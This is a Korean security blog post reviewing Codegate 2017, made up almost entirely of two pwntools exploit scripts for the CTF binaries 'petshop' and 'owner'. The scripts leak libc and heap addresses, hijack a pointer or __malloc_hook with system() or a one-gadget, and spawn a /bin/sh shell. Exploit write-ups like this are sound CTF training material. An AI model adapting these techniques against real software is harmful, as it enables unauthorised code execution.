cdor1's lab
codegate 2017 review 본문
petshop
from pwn import *
s = process('./petshop')
raw_input()
def buy(select):
print s.recvuntil('select:\n')
s.sendline('1')
print s.recvuntil('select:\n')
s.sendline(str(select))
def sell():
print s.recvuntil('select:\n')
s.sendline('2')
def sound(select):
print s.recvuntil('select:\n')
s.sendline('3')
print s.recvuntil('select for sound:\n')
s.sendline(str(select))
def set_pet(select, name, sound, feed):
print s.recvuntil('select:\n')
s.sendline('4')
print s.recvuntil('select for set:\n')
s.sendline(str(select))
print s.recvuntil('name:\n')
s.sendline(name)
print s.recvuntil('sound:\n')
s.sendline(sound)
print s.recvuntil('feed:\n')
s.sendline(feed)
def list():
print s.recvuntil('select:\n')
s.sendline('5')
def set_name(name):
print s.recvuntil('select:\n')
s.sendline('6')
print s.recvuntil("What's your name?\n")
s.sendline(name)
buy(1)
set_name('dddd')
set_pet(1, 'aaaa', 'bbbb', 'c'*12 + p64(0x604088) + '\x10')
list()
print s.recvuntil('person:')
libc_leak = u64(s.recv(6).ljust(8, '\x00'))
libc_base = libc_leak - 0xa59d0
oneshot = libc_base + 0xf1147
system = libc_base + 0x45390
log.info('libc : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
log.info('oneshot : ' + hex(oneshot))
buy(1)
set_pet(2, ';/bin/sh;', ';/bin/sh;', 'c'*12 + p64(0x604088) + '\x10' + '/bin/sh;'*0x10)
set_name(p64(system)[:-1])
s.interactive()owner
from pwn import *
s = process('./owner')
def go_back():
print s.recv(4096)
s.sendline('-1')
def add_apart(name, floor, house, something):
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil("What is your apartment's name? \n")
s.sendline(name)
print s.recvuntil('How many floor on your apartment? ')
s.sendline(str(floor))
print s.recvuntil('How many house in each floor? ')
s.sendline(str(house))
print s.recvuntil('Describe something about it :')
s.sendline(something)
def edit(select1, select2, modify_select=0, new=0, flag=0): # -1 -1 -1
print s.recvuntil('> ')
s.sendline('4')
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('> ')
s.sendline(str(select1))
print s.recvuntil('> ')
s.sendline(str(select2))
if flag:
print s.recvuntil('> ')
s.sendline(str(modify_select))
print s.recv()
s.sendline(new)
def change(select1, select2, select3): # -1 -1
print s.recvuntil('> ')
s.sendline('4')
print s.recvuntil('> ')
s.sendline('2')
print s.recvuntil('> ')
s.sendline(str(select1))
print s.recvuntil('> ')
s.sendline(str(select2))
print s.recvuntil('> ')
s.sendline(str(select3))
add_apart('1234', '1234', '1234', '1234')
add_apart('1234', '1234', '1234', '1234')
change(1, 1, 2)
go_back()
go_back()
edit(3, 1)
print s.recvuntil('Normal price of menu : ')
heap_leak = int(s.recv(14))
heap_base = heap_leak - 0x12cf0
log.info('heap_leak : ' + hex(heap_leak))
log.info('heap_base : ' + hex(heap_base))
go_back()
go_back()
go_back()
edit(1, 1, 1, 'a'*0x100, 1)
go_back()
go_back()
go_back()
change(1, 1 ,2)
go_back()
go_back()
edit(3, 2)
print s.recvuntil('Normal price of menu : ')
libc_leak = int(s.recv(15))
libc_base = libc_leak - 0x3c4b78
malloc_hook = libc_base + 0x3c4b10
oneshot = libc_base + 0xf02a4
log.info('libc_leak : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
go_back()
go_back()
go_back()
edit(3, 1, 6, str(malloc_hook), 1)
go_back()
go_back()
go_back()
edit(1, 1, 1, p64(oneshot), 1)
go_back()
go_back()
go_back()
s.sendline('5')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| fuzzer prototype (0) | 2018.03.19 |
|---|---|
| Study materials (0) | 2018.01.30 |
| malloc.c (0) | 2018.01.26 |
| pwnable.tw OmegaGo (0) | 2018.01.18 |
| pwnable.tw De-ASLR (0) | 2018.01.12 |
Comments